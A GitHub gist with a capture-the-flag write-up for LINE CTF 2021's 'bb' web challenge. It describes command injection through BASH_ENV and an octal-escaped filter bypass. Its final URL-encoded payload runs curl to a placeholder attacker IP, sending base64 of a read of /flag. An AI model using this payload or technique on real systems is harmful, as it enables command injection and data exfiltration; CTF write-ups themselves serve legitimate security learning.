Skip to content

Instantly share code, notes, and snippets.

@mdsnins

mdsnins/linectf2021_bb.md

Last active March 27, 2022 06:13
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mdsnins/da12a817fe18f3f3fb26663c4ceda0af to your computer and use it in GitHub Desktop.
Save mdsnins/da12a817fe18f3f3fb26663c4ceda0af to your computer and use it in GitHub Desktop.
Download ZIP
[LINE CTF 2021] bb
Raw
linectf2021_bb.md

bb

LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN

BASH_ENV envrionment

We can inject some bash command line using environment BASH_ENV.

BASH_ENV=touch /tmp /bin/bash will execute touch.

Non-alphabet command

It's like 34C3 ctf's challenge. We can call cat like $'\143\141\164'

Thus, final payload is

`$%27\143\165\162\154%27%20111.111.111.111:40010/$($%27\143\141\164%27%20$%27\57\146\154\141\147%27%20|%20$%27\142\141\163\145\66\64%27)`

replace 111.111.111.111 to attacker ip.

LINECTF{well..what_do_you_think_about}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment